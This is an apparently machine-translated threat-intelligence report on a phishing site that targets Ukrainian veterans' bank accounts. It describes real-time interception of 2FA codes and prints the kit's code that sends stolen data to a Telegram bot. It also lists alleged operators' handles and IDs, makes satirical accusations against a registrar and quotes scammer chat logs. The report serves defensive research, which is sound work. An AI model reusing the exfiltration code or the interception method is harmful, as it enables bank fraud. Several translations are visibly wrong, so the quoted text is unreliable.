5
Банки, що стали мішенями
6
Виклики API для зняття маски
2
Паралельні фішингові проекти
<30
За лічені хвилини — повний аналіз
Інформація про спонсорів(натисніть, щоб розгорнути)
Представляємо офіційного спонсора цього розслідування
🏆 NiceNIC International Group Co., Limited 🏆
Найбільш авторитетний реєстратор, який співпрацює з Netcraft (обманюючи їхню систему) · Офіційний постачальник доменів для Наркотичний маркетплейс «Kraken» · Постачальник оптових знижок · Відданий прихильник «Типовий шахрай» Спільнота у «ВКонтакте» — але досі не придбала курс з анонімності
$200
Ціна на .ru
120₽ реальних
0
Повідомлення про зловживання
виконано
- Незважаючи на те, що автор називає себе «китайцем» (Гонконг), він родом з Горлівка, Донецька Народна Республіка. Китайський логотип має суто декоративне значення — так само, як і їхні Умови надання послуг
- Забезпечує Підтримка російської мови через «ВКонтакте» та Telegram, продає
.ru за 200 доларів, тоді як reg.ru стягує 120₽ (~$1.30) - Негативні відгуки на Trustpilot, у яких згадується домени, пов’язані з ринком наркотиків загадково зникнути. Збіг обставин? Зовсім ні
- Активний передплатник «Типовий шахрай» (Типовий шахрай) Спільнота у «ВКонтакте» — коли ваш реєстратор підписується на групи-шахраї, ви розумієте, на яку аудиторію вони орієнтуються
- Співпрацює з Netcraft саме стільки, щоб уникнути виключення зі списку, при цьому зберігаючи інфраструктуру для доменів, пов’язаних із фішингом, азартними іграми та наркотиками
Тим часом у програмі «Типовий шахрай»:
Перекладено (англійською)
Обіцянка нашому спонсору: Коли цей допис від «Типичного Мошенника» стане реальністю — а, судячи з того, що нам відомо, це лише питання коли, а не якщо — уся наша команда зареєструється у «ВКонтакте» та підпишеться на спільноту. Вважайте це нашою бурхливою овацією. 👏
* Це сатира. Компанія NiceNIC не фінансувала це розслідування. Однак саме вона зробила його необхідним, відмовившись реагувати на наші повідомлення про зловживання протягом понад 5 днів. Усе, про що йдеться вище, ґрунтується на загальнодоступній інформації та нашому практичному досвіді. Прочитайте нашу повну статтю про NiceNIC →
Що виявив PhishDestroy
20 березня 2026 року автоматизований Pipeline виявлення загроз PhishDestroy зафіксував dopomogvoina[.]sbs — щойно зареєстрований домен, на якому розміщено фішинговий сайт, що видає себе за «Щит Захисника» («Щит захисника») — фейковий фонд, що нібито надає військову допомогу Україні. Сайт орієнтований на українських військових ветеранів, поранених у боях та родини загиблих солдатів, обіцяючи державну фінансову допомогу, при цьому викрадаючи банківські облікові дані п’яти найбільших банків України.
Далі наведено повний аналіз усіх фактів, виявлених у ході нашого автоматизованого аналізу: методи соціальної інженерії, технічна інфраструктура, система управління операторами в режимі реального часу, а також особи тих, хто керує цією системою.
Оцінка впливу
Цей сайт орієнтований саме на найбільш вразливі групи: ветеранів бойових дій, які страждають на ПТСР, сім’ї загиблих у бою військовослужбовців, які звертаються за державною допомогою, та поранених військовослужбовців, які намагаються розібратися у складних бюрократичних процедурах. Кожен викрадений логін може призвести до повного захоплення облікового запису за лічені хвилини.
Розділ 1: Приманка — «Фонд фальшивої військової допомоги»
Домен dopomogvoina[.]sbs було зареєстровано 20 березня 2026 року через NiceNIC International Group Co., Limited, реєстратор, який, як добре відомо, повільно реагує на повідомлення про зловживання або взагалі не реагує на них. Цей .sbs TLD (Side-By-Side) — це недорогий gTLD, який часто використовується для створення одноразової фішингової інфраструктури.
Сайт позиціонує себе як професійний портал допомоги, пов’язаний з урядом. У верхній частині сторінки розміщено український прапор, військові зображення додають автентичності, а текст сторінки ретельно написано українською мовою з використанням бюрократичних формулювань, що нагадують офіційні урядові програми.

Знімок екрана 5 — Головна сторінка фішингового сайту, що видає себе за «Щит Захисника».
Щоб створити враження надійності, оператори підробили лічильник статистичних даних, який було розміщено на видному місці на головній сторінці:
- 2 847 заявок — це означає, що тисячі людей уже отримали допомогу
- Розподілено ₴47,2 млн — значна, але правдоподібна цифра в гривнях
- 19 програм — що передбачає проведення комплексної операції з залученням кількох програм
Ці цифри повністю вигадані, вони жорстко вписані в вихідний код сторінки і не пов’язані з серверною частиною. Вони мають єдину мету: створити ефект соціального доказу, щоб подолати вагання жертви.
Розділ 2: Пастка — 5 банків, одна мета
Після натискання кнопки «Подати заявку» (Submit Application) перед жертвою з’являється екран вибору банку. У списку варіантів представлені п’ять найбільших роздрібних банків України, кожен із яких має власне офіційне оформлення та логотип. Саме на цьому етапі соціальна інженерія переходить від емоційної маніпуляції до технічного крадіжки.

Знімок екрана 6 — Екран вибору банку. Кожен варіант веде до індивідуальної послідовності дій, спрямованої на викрадення облікових даних.
Аналіз пакета JavaScript цього веб-сайту показав, що кожен банк має унікальна багатоетапна послідовність збору облікових даних, адаптований відповідно до фактичного алгоритму аутентифікації цього банку:
«ПриватБанк»
УвійтиПарольPIN-кодSMS
monobank
УвійтиPIN-кодSMSЕлектронна пошта
«Ощадбанк»
УвійтиПеревіритиSMS
«Укрсиббанк»
УвійтиPIN-кодSMS
Схема атаки на кожен банк відбувається за однаковим алгоритмом:
Сторінка з фейковою інформацією про допомогу
Вибір банку
Клон сторінки входу
Перехоплення 2FA
Захоплення облікового запису

Знімок екрана 7 — Клонована сторінка входу в PrivatBank.

Знімок екрана 9 — Клонована сторінка входу в систему PUMB.

Знімок екрана 10 — Повний хід атаки: від фальшивої сторінки про військову допомогу через вибір банку до викрадення облікових даних та захоплення контролю над рахунком.
Технологічний стек: React SPA інтерфейс, що надається через CDN від Cloudflare, з Express.js бекенд, що забезпечує витік облікових даних. Архітектура React дозволяє створювати інтуїтивно зрозумілі багатоетапні форми, які зовні не відрізняються від справжніх банківських інтерфейсів.
Розділ 3: Керування оператором у режимі реального часу
Це не просто програма для збору облікових даних зі статичною базою даних. Фішинговий набір включає інтерактивна панель управління WebSocket що дозволяє оператору керувати сеансом кожної жертви в режимі реального часу.
Кінцева точка WebSocket за адресою wss://dopomogvoina[.]sbs/ws підтримує такі типи повідомлень:
register — New victim session created
update_user_data — Stolen credentials transmitted to operator
next_step — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question — Operator sends custom prompt to victim
Завдяки такому управлінню в режимі реального часу оператор може:
- Примусово перевести в стан очікування — відображати повідомлення «Опрацьовується ваша заявка...» під час входу в реальний банківський рахунок жертви
- Перенаправлення на певний крок — повторно запросити SMS-код, якщо термін дії першого закінчився
- Показати фальшиві повідомлення про помилки — «Неправильний код, будь ласка, введіть його ще раз» — для збору декількох токенів двофакторної аутентифікації
- Задавати індивідуальні запитання — запит дати народження, номера картки або будь-яких додаткових даних під час сеансу
Чому це небезпечно
Управління оператором у режимі реального часу дозволяє обійти засоби захисту на основі двофакторної аутентифікації (2FA), що базуються на часових обмеженнях. Оператор перехоплює SMS-код і використовує його протягом терміну дії — зазвичай від 30 до 120 секунд — поки жертва дивиться на підроблену анімацію «обробки».

Знімок екрана 8 — Форма введення номера телефону, яка використовується для крадіжки облікових даних.

Знімок екрана 11 — Панель оператора для керування сеансами жертв у режимі реального часу.
Повний перелік даних, викрадених під час кожного сеансу: phone, password, PIN, SMS code, card number, date of birth, і email.
Розділ 4: Що стоїть за Cloudflare — два проєкти, один сервер
Проксі-сервер Cloudflare приховує вихідний сервер, але Pipeline аналізу інфраструктури PhishDestroy визначив справжню IP-адресу вихідного сервера: 45.131.214[.]148, розміщений на RapidSeedbox / LeaseWeb у Нідерландах.
Важлива деталь: dopomogvoina[.]sbs передається через Cloudflare, приховуючи свою IP-адресу походження. Але наша система також відстежує hlpforvpeople[.]sbs — пов’язаний домен, зареєстрований через того самого реєстратора NiceNIC із збіжними шаблонами. Цей домен — НЕ за Cloudflare, безпосередньо розкриваючи свою IP-адресу-джерело: 45.131.214[.]148.
Пряме підключення до цієї IP-адреси — без Host заголовок — виявив щось несподіване: а зовсім інший фішинговий сайт. Замість української військової допомоги, за замовчуванням використовувався віртуальний хост «HealthCare ID», фішингова операція, спрямована на користувачів системи медичного страхування в Індонезії. Той самий сервер, зовсім інші жертви, зовсім інша країна.
Той самий сервер, ті самі оператори, інші жертви
- Проєкт 1: Українська військова допомога → викрадає банківські облікові дані у ветеранів
- Проєкт 2: Індонезійська система медичного страхування → викрадає медичні дані громадян
- Той самий стек Express.js, та сама панель управління в режимі реального часу на базі WebSocket
- Той самий інтерфейс управління сервером BT-Panel (宝塔)
- Домен C2 другого проекту:
rezervtemka[.]cc — відома фішингова панель, виявлена в базі даних загроз PhishDestroy - Коментарі російською мовою у вихідному коді індонезійського проєкту підтверджують ті самі розробники з країн СНГ

Знімок екрана 12 — Дві паралельні фішингові операції, що використовують один і той самий сервер походження: українська військова допомога (dopomogvoina) та індонезійське медичне страхування (HealthCare ID).
Індонезійський шаблон фішингового листа — це відомий набір, зафіксований у базі даних про загрози PhishDestroy. Ми спостерігали, як різні варіанти саме цього шаблону використовувалися в країнах Південно-Східної Азії — для атак на фінансові установи Індонезії, Таїланду та В’єтнаму. Зловмисники просто замінюють шаблони, адаптовані під конкретну країну, продовжуючи використовувати ту саму серверну інфраструктуру.
Злочинці, які не розрізняють жертв
Ось яка реальність сучасних фішингових атак:
операторам байдуже, у кого вони крадуть. Українські ветерани, які шукають військову допомогу, індонезійські робітники, що купують медичну страховку, — цільова аудиторія змінюється залежно від того, який шаблон приносить найбільший прибуток. Одні й ті самі російськомовні оператори проводять обидві кампанії одночасно з одного сервера, перемикаючись між жертвами в різних країнах, наче перемикають телеканали. Сьогодні це українські банки. Завтра це можуть бути ізраїльські банки — про що «Боня» вже запитував у березні 2026 року.
Розділ 5: Файл config.json, який все викрив
Ось як один-єдиний файл із неправильними налаштуваннями зірвав усю операцію — крок за кроком.
Після виявлення другого проєкту сервера-джерела, PhishDestroy’s JS-аналізатор — наш автоматизований інструмент аналізу JavaScript — був спрямований на набір коду індонезійського фішингового сайту за адресою https://45.131.214[.]148/assets/index-ZMQxHb_h.js. Аналізатор виокремив усі кінцеві точки API, зовнішні URL-адреси та шляхи до файлів конфігурації з файлу JavaScript розміром 335 КБ. Серед виявлених даних:
- П'ять кінцевих точок API за адресою
rezervtemka[.]cc — панель C2 для перевірки облікових даних - З'єднання WebSocket із
wss://rezervtemka[.]cc - Інтеграція Facebook Pixel для відстеження жертв
- Посилання на
/config.json — завантажується під час виконання для налаштування бота Telegram
Слідуючи цій підказці, ми отримали /config.json з IP-адреси джерела. Доступ до файлу був можливий без будь-якої аутентифікації — він знаходився в кореневому каталозі веб-сайту, і його міг прочитати будь-хто:
async function loadConfig() {
const response = await fetch('/config.json');
// ...
}
async function sendNotification() {
const cfg = await loadConfig();
await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
method: 'POST',
body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
});
}
Цей /config.json доступ до файлу був можливий безпосередньо з IP-адреси джерела — без аутентифікації, без контролю доступу — просто звичайний файл JSON, що знаходиться в кореневому каталозі веб-сайту:
{
"bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
"chat_id": "-100XXXXXXXXXX"
}
Токен бота в Telegram є одночасно і іменем користувача, і паролем. Той, хто має цей токен, може здійснювати запити до API від імені цього бота. Оператори залишили свої токени у загальнодоступному файлі. Через шість викликів API ми отримали все:
getMe — Ідентифікатор бота: «MonettiCRM» (@MonettiCRM_bot)
getChat(chat_id) — Назва групи: «Idr card» з активним посиланням для запрошення
getChatAdministrators — 3 адміністратори, включаючи засновника групи
getChat(creator_id) — Автор: @monettiescobar, Telegram Premium, бізнес-профіль, часовий пояс UTC+3
getChat(admin2_id) — Другий адміністратор: порожній профіль, ймовірний альтернативний акаунт
getChatMemberCount — Усього 5 учасників у групі операторів

Знімок екрана 13 — Повний ланцюжок OSINT: від оприлюдненого файлу config.json до повної ідентифікації оператора за допомогою 6 викликів API.
Від одного неправильно налаштованого файлу до повної ідентифікації оператора за допомогою шести HTTP-запитів. Жодних експлойтів, жодного несанкціонованого доступу — лише стандартні виклики API-інтерфейсу Telegram Bot із використанням токена, який самі оператори залишили відкритим.
Розділ 6: Оператори
Замітка про кримінальну творчість
Далі йде майстер-клас із жахливого вибору псевдонімів. У нас є МОНЕТТІ ЕСКОБАР — адже ніщо так не підкреслює «непомітність», як назвати себе на честь найвідомішого наркобарона в історії. А ще є Боня, також відомий як PapaZakonVor (буквально «Тато-злодій-за-законом» — спроба натякнути на російську кримінальну ієрархію), Боа, і bubullikk. І наостанок Девойс, чий нік @devosus звучить підозріло схоже на «dev ops us» — розробник, який вказав свою посаду в імені користувача. Це ті люди, які думали, що зможуть перехитрити автоматизовану систему аналізу загроз. Спойлер: їм це не вдалося.

Знімок екрана 14 — Група операторів Telegram «Idr card», викрита завдяки витоку токена бота.

Власник / Творець
МОНЕТТІ ЕСКОБАР
@monettiescobar
Ідентифікатор у Telegram: 8135223234
Telegram Premium, бізнес-профіль
Часовий пояс: UTC+3 (регіон СНД)
10 публічних повідомлень — суворе дотримання OPSEC
Чат TraFFeeQMedusa Google AdsКанал «Deepfakes»

Оператор / Управління рухом
Боня
@BoaCC159
ID у Telegram: 6242202706
Також відомий як: PapaZakonVor, Boa, bubullikk
261 повідомлення у 12 групах
DC2 — Амстердам, Нідерланди
CryptoGrabSTYX MarketRaven CCEMPIRE CHATРішення «Фенікс»
Розробник / Програміст
Девойс
@devosus
Ідентифікатор у Telegram: 8213612730
Розробник фішингового набору — оператори називають його «кодером»
У разі виявлення порушення просять «подумати про захист»
Мінімальний вплив на навколишнє середовище завдяки конструктивним рішенням
Ручка @devosus ≈ «dev ops us» — назва посади як ім’я користувача
Розробник наборуІнфраструктураБезпека
МОНЕТТІ ЕСКОБАР — «Бос»
MONETTI дотримується суворих вимог щодо операційної безпеки — лише 10 публічних повідомлень у двох групах. Але саме ці групи і розкривають суть справи: Чат TraFFeeQ (арбітраж трафіку з метою шахрайства), Medusa Google Ads (чорношапкові методи в Google Ads) та Канал «Deepfakes». У його бізнес-профілі в Telegram вказано «Є пропозиція» («У мене є пропозиція») — відкрито рекламують свої послуги. Часовий пояс UTC+3 (що відповідає часовим поясам Москви, Мінська та Києва) та режим роботи 24/7 свідчать про те, що компанія базується в країнах СНГ і працює цілодобово.
Боня — Недбалий
На відміну від ретельної оперативної безпеки (OPSEC), якої дотримувався MONETTI, Боня (колишнє псевдонім: PapaZakonVor — що приблизно перекладається як «Тато-злодій за законом») залишив за собою величезний цифровий слід — 261 повідомлення у 12 підпільних групах. Історія його чатів нагадує кримінальне резюме:
Слова самого Боні (перекладено з російської)
- "фіші на струм 2,0" → «Це просто фішинг [банківської безпеки] 2.0» — обговорення сумісності фішингових наборів із новітніми системами безпеки банків
- «Хороші дропи важко знайти» → «Хороших «грошових мулів» важко знайти» — пошук спільників для виведення коштів
- «Приходьте до мене в культурний центр працювати» → «Приходьте працювати в мій кол-центр» — набір операторів
- «А чи є тут люди, які працювали з ізраїльськими банками?» → «Чи є тут хтось, хто працював з ізраїльськими банками?» — розширення на нові цілі (березень 2026 року)
- «Логотипів на Фінке я, чесно кажучи, особливо не бачу» → «Не бачу багато фінансових записів» — обговорення якості викрадених облікових даних
- «Якщо 1 проксі — 1–2 банки струму» → «Один довірений представник лише для 1–2 банків» — обговорення питань оперативної безпеки щодо банківського шахрайства
- «Банкомат застряг її картку» → «Її картку затягнуло в банкомат» — «грошовий мул» вкрав у них ₴60 000, стверджуючи, що банкомат проковтнув картку. Навіть злочинці стають жертвами шахрайства з боку своїх власних спільників.
Його членство в різних організаціях дає повне уявлення про нього: CryptoGrab (злодії з криптогаманців), STYX Market (підпільний ринок викрадених даних), Програма перевірки Raven CC (інструменти перевірки кредитних карток), EMPIRE CHAT та Рішення «Фенікс» (координація шахрайських дій). Це не злочинець, який скоїв злочин лише один раз, — це людина, яка є невід’ємною частиною екосистеми кіберзлочинності.
Devoys — розробник
Технічна основа операції. За задумом — мінімальна видимість для громадськості. Коли групу зламали, Боня прямо звернувся до нього: «@devosus, подумай про захист, поки нам дупу не розірвали» — «@devosus, давай подумаємо про оборону, перш ніж нас рознесуть вщент». Його саркастична реакція на цей інцидент — "коли в Інтерпол" («коли застосовувати інтерполяцію») — свідчить про те, що це не перший випадок, коли їм ледь вдалося уникнути небезпеки.
Аналіз поведінки: розшифровано 261 повідомлення
Pipeline OSINT від PhishDestroy зібрав та переклав усі 261 публічних повідомлень від «Боні» у 12 підпільних групах Telegram (червень 2024 — березень 2026). Машинний переклад за допомогою API DeepL з ручною корекцією контексту. Ці повідомлення розкривають повний оперативний профіль — класифікований нижче за видами злочинної діяльності.
Розсилка повідомлень: 261 повідомлення у 12 групах
- 💬ONE|Чат — 91 повідомлення (координація шахрайських дій)
- Актуальне/перевірки — 37 повідомлень (шахрайські спроби підтвердження)
- Rolex | загальний чат — 28 повідомлень (кардинг)
- EMPIRE CHAT — 24 повідомлення (чорний ринок)
- Фбстор — 23 повідомлення (арбітраж трафіку)
- FB-DOC — 22 повідомлення (шахрайство у сфері реклами)
- Рішення «Фенікс» — 17 повідомлень (банківське шахрайство)
- CryptoGrab — 11 повідомлень (виведення криптовалюти)
- STYX Market — 2 повідомлення (підпільний ринок)
- Програма перевірки Raven CC — 2 повідомлення (перевірка картки)
Банківське шахрайство та фішинг
💬ONE|ЧатБерезень 2025 року
«Тут лише 2,0 фіш»
А тут фіші на струм 2,0
Обговорення сумісності фішингових наборів із новими протоколами безпеки банків
💬ONE|ЧатБерезень 2025 року
«Брате, тут на Phish нічого не продають, це Phish для оплати»
Братан, тут нічого не продають за фішки — тут фішки використовуються для оплати
Відмінності між фішингом з метою продажу та фішингом з метою безпосередньої крадіжки
Рішення «Фенікс»Березень 2026 року
«Чи є тут хтось, хто працював у банках в Ізраїлі?»
А чи є тут люди, які працювали з ізраїльськими банками?
Розширення діяльності на ізраїльський банківський сектор — за 5 днів до початку нашого розслідування
Rolex | загальний чатВересень 2024 року
«Якщо 1 довірена особа, то лише 1–2 банки»
Якщо 1 проксі — 1–2 банки струму
Оперативна безпека при шахрайстві, що охоплює кілька банків: один проксі-сервер на 1–2 банки, щоб уникнути виявлення
Rolex | загальний чатВересень 2024 року
«Не бачу там нічого особливого щодо фінансових звітів»
Логотипів на Фінке я, чесно кажучи, особливо не бачу
Скарги на якість викрадених банківських облікових даних на підпільних ринках
«Грошові мули» та виведення коштів
💬ONE|ЧатБерезень 2025 року
«Хороші краплі — рідкість»
Хороші дропи теж важко знайти
«Дропси» — це «грошові мули», які обмінюють в готівку викрадені кошти. Скаржаться на труднощі з набором нових учасників.
💬ONE|ЧатБерезень 2025 року
«Приходьте працювати в мій кол-центр»
Прийшли до мене в культурний центр працювати
Активний набір співробітників для роботи в шахрайському кол-центрі
АктуальнеЧервень 2024 року
«У нас вкрали 60 тисяч»
у нас вкрали 60 тис.
«Грошовий мул» вкрав ₴60 000 у самих шахраїв. Іронія долі.
АктуальнеЧервень 2024 року
«Як, блядь, банкомат міг проковтнути картку?»
Як, блядь, банкомат міг затягнути картку?
Шахрай стверджував, що банкомат «проковтнув» картку, щоб залишити собі вкрадені кошти. Шахраї обманюють шахраїв.
АктуальнеЧервень 2024 року
«Вона переказала нам ці гроші, але у нас не було основного каналу для їхнього переказу»
Вона переклала це на нас, а у нас не було основного джерела доходу, щоб переказати гроші
Опис ланцюжка виведення коштів: жертва → проміжний рахунок → основний «грошовий мул»
Шахрайство у сфері веб-трафіку та зловживання рекламою
EMPIRE CHATБерезень 2026 року
«Я не користуюся Google, тільки Facebook»
Ну, я не працюю з Google, а тільки з Facebook
Спеціалізується на шахрайстві з рекламою у Facebook — залученні трафіку на фішингові сторінки
FB-DOCлютий 2026 року
«Я б теж не виділив % від рекламного бюджету без поручителя»
Я б теж не вкладав гроші за відсоток від витрат без поручителя
Переговори щодо умов оплати за проведення шахрайських рекламних кампаній у Facebook
CryptoGrabсічень 2025 року
«Я спробував скористатися AML у Facebook для націлювання на аудиторію в Америці — але в Інтернеті не зміг знайти жодних вдалих налаштувань»
Я намагався знайти інформацію про АМЛ у Facebook, але в Інтернеті так само не знайшов ніяких корисних, навіть старих, посилань
Спроба використання реклами у Facebook для здійснення шахрайських схем, спрямованих на боротьбу з відмиванням грошей, що націлені на жертв із США
Психологічний профіль: Боня
Корпус із 261 повідомленням показує, що кіберзлочинець середнього рівня з різноманітними видами діяльності: банківський фішинг, мережі «грошових мулів», шахрайство з рекламою у Facebook, виведення криптовалюти та перевірка кредитних карток. Основні ознаки:
- Недбалість під час виконання службових обов’язків — 261 повідомлення у публічних групах, надісланих з одного облікового запису. Використання кількох псевдонімів (PapaZakonVor → Boa → Bonya) свідчить про обізнаність з питаннями оперативної безпеки (OPSEC), але про нездатність дотримуватися її на практиці
- Підхід до підбору персоналу — активно запрошує людей «працювати в моєму кол-центрі» та продає практичні знання за гроші
- Байдужість до жертв — з однаковою об’єктивністю розглядає українські, європейські, ізраїльські та американські цілі. Географія — це лише одна зі змінних у рівнянні шахрайства
- Проблеми з довірою — його зрадив власний «грошовий мул» за 60 тис. ₴. Це, як не дивно, є дзеркальним відображенням тієї недовіри, яку він вселяє у своїх жертв
- Орієнтований на розширення — ще в березні 2026 року активно розширюючи свою діяльність на нові банківські ринки (Ізраїль), що свідчить про те, що українська фішинг-операція є лише однією з багатьох операцій, що проводяться одночасно
Bonya: Повний журнал повідомлень (253 повідомлення у 12 групах)
-- Phoenix Solution (16 повідомлень) --
B
Боня2026-03-17 14:22
Чи є тут хтось, хто мав справу з банками в Ізраїлі?А чи є тут люди, які працювали з ізраїльськими банками?
B
Боня2026-03-17 14:22
також тихо працюють.ми теж працюємо тихо
B
Боня2026-03-17 14:17
як справи?як справи
B
Боня2026-03-17 14:17
Привіт усім!привіт усім
B
Боня2026-03-15 19:02
Ну, тепер, здається, все вже майже виправлено.Ну, загалом уже все налагодили
B
Боня2026-03-15 19:02
Ну, це трохи клопітноНу, так, трохи клопоту наробили
B
Боня2026-03-15 19:01
Так, я теж багато працював у тиші, все пішло нанівець.Та й від цієї тихої роботи я вже добряче втомився
B
Боня2026-03-15 19:00
Як пройшов твій вихідний?Як пройшли вихідні
B
Боня2026-03-15 19:00
Усі ви.Спільні для всіх
B
Боня2026-03-14 14:29
Тепер він уже не такий анонімний, адже всі знають, що це Марік.Він уже й не такий вже й анонімний, раз усі знають, що це за Марік
B
Боня2026-03-14 14:24
ВідродженняВідродився
B
Боня2026-03-14 14:24
АхахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахаАхахахахахахахахах
B
Боня2026-03-14 14:23
Я засмутився, коли побачив, що чат зник.Я навіть засмутився, коли побачив, що чат зник
B
Боня2026-03-14 14:22
Я думав, що ніколи тебе не знайду.Я вже думав, що не знайду вас
B
Боня2026-03-14 14:22
КуКу
B
Боня2026-03-14 14:22
БлядьЕба
-- 👨⚕️ FB-DOC — Чат про арбітраж трафіку (21 повідомлення) --
B
Боня2026-03-15 07:23
@fbdoc21@fbdoc21
B
Боня2026-03-15 07:20
Вдар себе членом по лобі.По лобі себе членом поб’ю
B
Боня2026-03-06 15:18
Наприклад, п’ять на екрані розміром 2,5😂.Як п’ять на скріншоті 2,5😂
B
Боня2026-02-19 17:05
всім вам.з вами всіма
B
Боня2026-02-19 17:04
Якщо ти укладеш угоду, я буду сміятися.якщо відкриєте угоду, я розсміюся
B
Боня2026-02-19 17:04
континентальний?континентальний?
B
Боня2026-02-19 17:04
Ось вона.ось вона й погодилася
B
Боня2026-02-19 17:01
Тому завжди перевіряйте, коли запитуєте про поручителя.Тож завжди перевіряйте це, коли запитуєте про гарантію
B
Боня2026-02-19 17:00
Він поцікавився щодо поручителя й одразу ж зник.Хтось запитав про гаранта — і одразу зник
B
Боня2026-02-19 17:00
ай, КарінаА, Карино!
B
Боня2026-02-19 16:59
То ти збираєшся знайти поручителя?Ну, ти йдеш до гаранта?
B
Боня2026-02-19 16:57
Я б теж не виділяв відсоток від витрат без поручителя.Я б теж не вкладав гроші за відсоток від витрат без поручителя
B
Боня2026-02-19 16:57
я?я?
B
Боня2026-02-19 16:57
Ну, вона виклала скріншоти, а ти мені нічого не дав.ну, вона виклала скріншоти, а ти нічого не показав
B
Боня2026-02-19 16:56
погляньте на скріншоти, які вона виклалаподивися скріншоти, які вона надіслала
B
Боня2026-02-19 16:55
він не написав про поручителя?Він не писав про гаранта?
B
Боня2026-02-19 16:54
Ти просто дивак😂ти що, дивак😂
B
Боня2026-02-19 16:53
Ви попросили надати поручителя.Ти просив гаранта
B
Боня2026-02-19 16:52
дев якому місці
B
Боня2026-02-17 14:37
Хто зможе забезпечити магазин якісними автомобілями?Хто відкриє магазин з гарними машинами
B
Боня2026-02-17 12:10
Де б ти не захотів — вони це для тебе зроблять😂У будь-якому місці, де тобі сподобається, вони це зроблять😂
-- ЧАТ «EMPIRE» (24 повідомлення) --
B
Боня2026-03-14 13:17
Я вже з’ясував, як це зробити, але мені лінь пояснювати.Я вже зрозумів, як це зробити, але лінь пояснювати
B
Боня2026-03-14 13:17
Він тебе розіб’є, що б там не було.Він у будь-якому разі тебе обдурить
B
Боня2026-03-12 17:16
По-різному.По-різному
B
Боня2026-03-12 17:08
+ до того ж зараз буває багато штормів.+ зараз сильні шторми
B
Боня2026-03-12 17:07
Якщо воно чорне, то я готовий побитися об заклад, що...Якби це було чорне, я б посперечався
B
Боня2026-03-12 17:07
Залежить від того, яка саме пропозиція — якщо вона «біла», то так.Залежить від того, яка пропозиція: якщо біла — то так
B
Боня2026-03-12 17:06
Це два різних світиДва різних світи — це
B
Боня2026-03-12 17:06
Іншого немаєІншої взагалі немає
B
Боня2026-03-12 17:06
Ви можете налаштувати систему так, щоб лише ПКТам можна налаштувати так, щоб були лише ПК
B
Боня2026-03-12 17:05
Google не настільки ефективний, як я вважаю.На мою думку, Google не такий ефективний
B
Боня2026-03-12 17:05
Ну, я не користуюся Google, а лише Facebook.Ну, я не працюю з Google, а тільки з Facebook
B
Боня2026-03-12 17:05
До того моменту, поки вам не доведеться знайти лігатуру протягом усього процесу.За умови, що ще треба якось звести всі ці дурниці в одне ціле
B
Боня2026-03-12 17:04
Відхилення, «аккі» розлітаються, наче бурі. І так далі.Реджекти, акаунти злітають просто так, як шторми. І т. д.
B
Боня2026-03-12 17:04
Не все так гладко, друже.Ні, це ще не все, брате, це лише початок
B
Боня2026-03-12 17:03
Усі регулярні придбання акцій авіакомпаній, що користуються більшою довіроюЦе звичайні акумулятори з найкращим довірою
B
Боня2026-03-12 17:03
Наразі на ринку немає жодного гідного агентства.Зараз на ринку немає хороших агентств
B
Боня2026-03-12 17:02
Більше випробовує нерви, ніж лякаєШвидше, це більше нервує, ніж лякає
B
Боня2026-03-12 17:02
Криптовалюта, азартні ігри та чорношкірість — все це виливається назовніКриптовалюта, азартні ігри та порно — все це тече рікою
B
Боня2026-03-12 17:01
Останнє, що зробило місто, — це зламало систему 2d.Останнє, що з’явилося в 2D, було класне
B
Боня2026-03-12 17:01
Якщо говорити про скелелазіння, то, судячи з мого власного досвіду або з огляду на бюджет, щоб знайти підходящі маршрути у 2D, потрібно витратити 1–2 тис. зелів на тести, і це не протримається довго.Вийде, якщо шукати — чи то за власний рахунок, чи за рахунок бюджету — щоб знайти те, що підійде для 2D, доведеться витратити 1–2 тис. зела на тестування, і навіть тоді воно прослужить недовго
B
Боня2026-03-12 17:00
Я наливаюЯ ллю
B
Боня2026-03-12 16:59
Оскільки до пропозицій щодо білих таких вимог немає)Тому що до білих офферів таких вимог немає)
B
Боня2026-02-14 14:33
У кого є «дрейнер» за тестом AML? Тільки з DEP або «ready» у поручителяУ кого є дрейнер для тесту AML? Тільки з депом чи готові на гаранта?
B
Боня2026-01-11 03:14
У групі «FB Beat» є хтось, і є один приятель. Потрібно поповнити рахунок у FB, ціна — за домовленістюХтось вже писав у Фейсбуці, там є нецензурні вирази. Потрібно поповнити рахунок у Фейсбуці — щодо ціни домовимося
-- SТYХ СНAT [ STYXMARKET.ST ] (2 повідомлення) --
B
Боня2025-12-05 12:04
Потрібні рахунки-фактури, Payzaty, Cashfree, Eportal 3dsПотрібні рахунки-фактури, Payzaty, Cashfree, Eportal 3ds
B
Боня2025-11-22 11:14
Чи є гарант у чаті?Тут є модератор чату?
-- Чат «Арбітраж трафіку» (2 повідомлення) --
B
Боня2025-11-24 14:50
100%100%
B
Боня2025-11-24 14:49
Канал Tg буде захопленоКанал у Telegram заблокують
-- Програма перевірки CC від Raven (2 повідомлення) --
B
Боня2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
Боня2025-11-21 21:18
/check/check
-- Чат у браузері Vision (2 повідомлення) --
B
Боня2025-11-14 16:47
Дякую.Дякую
B
Боня2025-11-14 16:47
vicen werk на ру?Як виглядає вижн-ворк?
-- 💬ONE|Чат (86 повідомлень) --
B
Боня2025-03-05 17:06
Хлопці, підкажіть мені магазин, де можна купити прокладки.Хлопці, підкажіть, де можна взяти майданчики
B
Боня2025-03-05 16:22
навіть не можу зробити манікюрпросто навіть манікюр зробити не може
B
Боня2025-03-05 16:22
так самотак само
B
Боня2025-03-05 16:21
Чорт забирай, скажи мені, чи є у наставника чат зі студентами, чи ні.Блін, хто-небудь, скажіть, чи є у наставника чат з учнями, чи ні
B
Боня2025-03-05 16:10
і чий цеа хто це?
B
Боня2025-03-05 15:44
Це не складно, але тут немає повних посібників, лише навчальні матеріали.Там не складно, але повних посібників тут немає — є лише поради наставників
B
Боня2025-03-05 15:42
В принципі, так, якщо знати, як це зробити.по суті, так, якщо вмієш
B
Боня2025-03-05 15:42
півдняпівдня
B
Боня2025-03-05 15:42
У першому — 600 осіб, а він не відповідає.щодо перших 600 осіб він не відповідає
B
Боня2025-03-05 15:41
Якщо у вас є гроші, купіть той, що коштує 200 доларів.якщо є гроші, бери ту, яка просить 200 доларів
B
